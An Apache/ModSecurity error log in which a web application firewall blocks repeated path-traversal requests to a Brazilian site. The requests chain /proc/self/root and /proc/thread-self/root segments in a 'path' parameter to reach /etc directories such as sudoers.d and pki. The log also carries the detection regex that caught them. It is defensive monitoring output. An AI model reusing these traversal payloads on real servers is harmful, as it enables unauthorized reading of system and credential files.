[Tue Mar 17 18:01:09.222273 2026] [:error] [pid 25836:tid 140411540502272] [client 74.7.243.128:38062] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnBFYh-PF_25v4hFRCBOwAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 18:01:09.957532 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.241.31:55648] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnBFeyqAr6etmhZHNo-BAAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:01:34.077145 2026] [proxy_fcgi:error] [pid 25836:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:33422] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:01:37.551127 2026] [:error] [pid 2598:tid 140411708356352] [client 74.7.243.128:55274] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnBMRj0p0SRWAqcjGGQgQAAAwQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:01:42.012391 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.241.31:44228] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnBNta6ubjKNq_cu4YeCQAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:01:43.689903 2026] [:error] [pid 6296:tid 140411641214720] [client 74.7.241.31:36392] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnBN3Ik7brgkOH-rIWjAwAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:01:47.793706 2026] [:error] [pid 7437:tid 140411741927168] [client 74.7.241.31:36398] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnBOweiSKl8TjouI-YuFQAAA8A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:01:48.396864 2026] [:error] [pid 7437:tid 140411632822016] [client 74.7.241.31:36398] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnBPAeiSKl8TjouI-YuFgAAA80"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:01:49.787008 2026] [:error] [pid 2473:tid 140411741927168] [client 74.7.241.31:55694] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnBPaBJNF7axNlVR0UvAAAAAAA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:01:52.078130 2026] [:error] [pid 2598:tid 140411607643904] [client 74.7.241.31:55710] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnBQBj0p0SRWAqcjGGQhwAAAxA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:01:53.524197 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:55726] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnBQda6ubjKNq_cu4YeFwAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:01:56.108496 2026] [proxy_fcgi:error] [pid 19507:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:33760] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:01:56.656376 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.241.31:55730] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnBRNa6ubjKNq_cu4YeHgAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:01:58.006883 2026] [:error] [pid 7437:tid 140411725141760] [client 74.7.241.31:59092] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnBRQeiSKl8TjouI-YuGQAAA8I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:01:58.163392 2026] [:error] [pid 7437:tid 140411624429312] [client 74.7.241.31:59092] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnBRgeiSKl8TjouI-YuGgAAA84"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:02:18.128801 2026] [proxy_fcgi:error] [pid 19507:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:34192] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:02:19.656991 2026] [:error] [pid 7437:tid 140411725141760] [client 74.7.241.31:59102] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnBWweiSKl8TjouI-YuJgAAA8I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:02:22.852332 2026] [:error] [pid 7004:tid 140411599251200] [client 74.7.241.31:46576] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnBXcU6Sx0TG1YjmQjE_gAAApE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:02:24.845073 2026] [:error] [pid 29151:tid 140411574073088] [client 74.7.241.31:46586] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnBYPPqhzTj3BvfDX-eBwAAAdQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:02:40.137827 2026] [proxy_fcgi:error] [pid 6296:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:34642] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:02:42.271721 2026] [:error] [pid 29151:tid 140411666392832] [client 74.7.241.31:42070] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnBcvPqhzTj3BvfDX-eEQAAAck"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:03:02.165823 2026] [proxy_fcgi:error] [pid 2473:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:34988] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:03:04.176023 2026] [:error] [pid 7004:tid 140411599251200] [client 74.7.241.31:39400] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnBiMU6Sx0TG1YjmQjFBwAAApE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:03:17.712794 2026] [:error] [pid 2598:tid 140411716749056] [client 74.7.241.31:42144] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnBlRj0p0SRWAqcjGGQogAAAwM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:03:20.747518 2026] [:error] [pid 25836:tid 140411582465792] [client 74.7.241.31:42160] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnBmIh-PF_25v4hFRCBXwAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:03:25.513817 2026] [proxy_fcgi:error] [pid 19507:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:35234] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:03:25.838709 2026] [:error] [pid 7004:tid 140411616036608] [client 74.7.241.31:42188] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnBncU6Sx0TG1YjmQjFDQAAAo8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
